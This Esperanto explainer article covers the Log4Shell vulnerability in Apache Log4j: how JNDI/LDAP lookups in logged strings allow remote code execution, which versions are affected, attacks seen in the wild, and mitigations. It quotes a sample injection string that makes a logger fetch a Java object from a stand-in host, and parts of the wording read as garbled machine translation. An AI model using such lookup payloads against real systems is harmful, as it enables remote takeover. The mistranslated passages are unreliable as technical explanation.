Enhavtabelo[Kaŝi][Montri]
Fine de novembro 2021, ni malkovris gravan minacon al cibersekureco. Ĉi tiu ekspluato eble influus milionojn da komputilaj sistemoj tutmonde.
Ĉi tio estas gvidilo pri la vundebleco de Log4j kaj kiel preteratentita difekto de dezajno lasis pli ol 90% de la komputilaj servoj de la mondo malfermitaj al atako.
Apache Log4j estas malfermfonta Java-bazita registra ilo evoluigita fare de la Apache Software Foundation. Origine verkita de Ceki Gülcü en 2001, ĝi nun estas parto de Apache Logging Services, projekto de la Apache Software Foundation.
Firmaoj ĉirkaŭ la mondo uzas la Log4j-bibliotekon por ebligi ensalutu en siaj aplikoj. Fakte, la Java biblioteko estas tiel ĉiea, vi povas trovi ĝin en aplikoj de Amazon, Microsoft, Google, kaj pli.
La eminenteco de la biblioteko signifas, ke ajna ebla difekto en la kodo povus lasi milionojn da komputiloj malfermitaj al hakado. La 24-an de novembro 2021, a nuba sekureco esploristo laboranta por Alibaba malkovris teruran difekton.
La vundebleco de Log4j, ankaŭ konata kiel Log4Shell, ekzistis nerimarkita ekde 2013. La vundebleco permesis al malicaj agantoj ruli kodon sur tuŝitaj sistemoj kurantaj Log4j. Ĝi estis publike malkaŝita la 9-an de decembro 2021
Industriaj fakuloj nomas la difekton de Log4Shell la plej granda vundebleco en lastatempa memoro.
En la semajno post la publikigo de la vundebleco, cibersekurecaj teamoj detektis milionojn da atakoj. Iuj esploristoj eĉ observis rapidecon de pli ol cent atakoj por minuto.
Kiel ĝi funkcias?
Por kompreni kial Log4Shell estas tiel danĝera, ni devas kompreni, kion ĝi kapablas.
La vundebleco de Log4Shell ebligas arbitran kodon, kio esence signifas, ke atakanto povas ruli ajnan komandon aŭ kodon sur celmaŝino.
Kiel ĝi plenumas ĉi tion?
Unue, ni devas kompreni kio estas la JNDI.
La Java Naming and Directory Interface (JNDI) estas Java servo kiu permesas al Java programoj malkovri kaj serĉi datumojn kaj rimedojn per nomo. Ĉi tiuj adresarservoj estas gravaj ĉar ili provizas organizitan aron de rekordoj por ke programistoj facile referencas dum kreado de aplikoj.
La JNDI povas uzi diversajn protokolojn por aliri certan dosierujon. Unu el ĉi tiuj protokoloj estas la Lightweight Directory Access Protocol, aŭ LDAP.
Dum ŝnuro de ŝnuro, log4j elfaras ŝnurojn kiam ili renkontas esprimojn de la formo ${prefix:name}
.
Ekzemple, Text: ${java:version}
povus esti ensalutinta kiel Teksto: Java versio 1.8.0_65. Ĉi tiuj specoj de anstataŭoj estas kutimaj.
Ni povas ankaŭ havi esprimojn kiel ekz Text: ${jndi:ldap://example.com/file}
kiu uzas la JNDI-sistemon por ŝargi Java objekton de URL per la LDAP-protokolo.
Ĉi tio efike ŝarĝas la datumojn venantajn de tiu URL en la maŝinon. Ĉiu ebla retpirato povas gastigi malican kodon en publika URL kaj atendi ke maŝinoj uzantaj Log4j ensalutu ĝin.
Ĉar la enhavo de protokolaj mesaĝoj enhavas uzant-kontrolitajn datenojn, retpiratoj povas enigi siajn proprajn JNDI-referencojn kiuj montras al LDAP-serviloj kiujn ili kontrolas. Ĉi tiuj LDAP-serviloj povas esti plenaj de malicaj Java objektoj, kiujn la JNDI povas efektivigi per la vundebleco.
Kio plimalbonigas ĉi tion estas, ke ne gravas ĉu la aplikaĵo estas servila flanko aŭ klientflanka aplikaĵo.
Dum ekzistas maniero por la hakisto legi la malican kodon de la atakanto, la aplikaĵo ankoraŭ estas malfermita al ekspluatoj.
Kiu estas trafita?
La vundebleco influas ĉiujn sistemojn kaj servojn kiuj uzas APache Log4j, kun versioj 2.0 ĝis kaj inkluzive de 2.14.1.
Pluraj sekurecaj fakuloj konsilas, ke la vundebleco povas influi kelkajn aplikaĵojn uzante Java.
La difekto unue estis malkovrita en la videoludo Minecraft, posedata de Mikrosofto. Mikrosofto instigis siajn uzantojn ĝisdatigi sian Java-eldonan Minecraft-programaron por malhelpi ajnan riskon.
Jen Easterly, la Direktoro de Cibersekureco kaj Infrastruktura Sekureca Agentejo (CISA) diras, ke vendistoj havas grava respondeco malhelpi finajn uzantojn de malicaj agantoj ekspluatante ĉi tiun vundeblecon.
"Vendistoj ankaŭ devas komuniki kun siaj klientoj por certigi, ke finuzantoj scias, ke ilia produkto enhavas ĉi tiun vundeblecon kaj devus prioritatigi programajn ĝisdatigojn."
La atakoj laŭdire jam komenciĝis. Symantec, firmao kiu disponigas cibersekurecan programaron, observis varian nombron da atakpetoj.
Jen kelkaj ekzemploj de la specoj de atakoj, kiujn esploristoj detektis:
- botnets
Botnets estas reto de komputiloj kiuj estas sub la kontrolo de ununura atakanta partio. Ili helpas fari DDoS-atakojn, ŝteli datumojn kaj aliajn fraŭdojn. Esploristoj observis la Muhstik-botneton en ŝelaj skriptoj elŝutitaj de la ekspluato Log4j.
- XMRig Miner Trojan
XMRig estas malfermfonta kripta monero-ministo, kiu uzas CPUojn por minigi la Monero-ĵetonon. Ciberkrimuloj povas instali XMRig sur la aparatoj de homoj por ke ili povu uzi sian pretigpovon sen sia scio.
- Khonsari Ransomware
Ransomware rilatas al formo de malware desegnita por ĉifri dosierojn sur komputilo. Atakantoj tiam povas postuli pagon kontraŭ redonado de aliro al la ĉifritaj dosieroj. Esploristoj malkovris la Khonsari-ransomware en Log4Shell-atakoj. Ili celas Windows-servilojn kaj uzas la .NET-kadron.
Kio okazas poste?
Fakuloj antaŭdiras, ke eble daŭros monatojn aŭ eble eĉ jarojn por plene ripari la kaoson kaŭzitan de la vundebleco de Log4J.
Ĉi tiu procezo implikas ĝisdatigi ĉiun tuŝitan sistemon kun flikita versio. Eĉ se ĉiuj ĉi tiuj sistemoj estas flikitaj, ankoraŭ ekzistas la minaca minaco de eblaj malantaŭaj pordoj, kiujn retpiratoj eble jam aldonis al la fenestro, ke serviloj estis malfermitaj por atako.
Multaj solvoj kaj mildigoj ekzistas por malhelpi aplikojn esti ekspluataj de ĉi tiu cimo. La nova Log4j-versio 2.15.0-rc1 ŝanĝis diversajn agordojn por mildigi ĉi tiun vundeblecon.
Ĉiuj funkcioj uzantaj JNDI estos malŝaltitaj defaŭlte kaj foraj serĉoj ankaŭ estis limigitaj. Malebligi la serĉan funkcion en via agordo de Log4j helpos malpliigi la riskon de eblaj ekspluatoj.
Ekster Log4j, ekzistas ankoraŭ la bezono de pli larĝa plano por malhelpi malfermfontajn ekspluatojn.
Pli frue en majo, la Blanka Domo publikigis an plenuma ordono kiu celis plibonigi nacian cibersekurecon. Ĝi inkludis zorgaĵon por programara fakturo (SBOM) kiu estis esence formala dokumento kiu enhavis liston de ĉiu objekto necesa por konstrui la aplikiĝon.
Ĉi tio inkluzivas partojn kiel la malferma fonto pakaĵoj, dependecoj kaj APIoj uzataj por disvolviĝo. Kvankam la ideo de SBOM estas helpema por travidebleco, ĉu ĝi vere helpos la konsumanton?
Ĝisdatigi dependecojn povas esti tro da ĝeno. Firmaoj povas simple elekti pagi ajnajn monpunojn prefere ol riski malŝpari kroman tempon trovi alternativajn pakaĵojn. Eble ĉi tiuj SBOM-oj nur estos utilaj se ilia medio estas limigita plu.
konkludo
La Log4j-afero estas pli ol nur teknika problemo por organizoj.
Komercaj gvidantoj devas konscii eblajn riskojn, kiuj povus okazi kiam iliaj serviloj, produktoj aŭ servoj dependas de kodo, kiun ili mem ne konservas.
Fidi je malfermfontaj kaj triaj aplikoj ĉiam venas kun iom da risko. Firmaoj devus pripensi ellabori riskajn mildigajn strategiojn antaŭ ol novaj minacoj aperas.
Granda parto de la reto dependas de malfermfonta programaro prizorgata de miloj da volontuloj tutmonde.
Se ni volas konservi la retejon sekura loko, registaroj kaj korporacioj devus investi en financado de malfermfontaj klopodoj kaj cibersekurecaj agentejoj kiel ekzemple CISA.
Lasi Respondon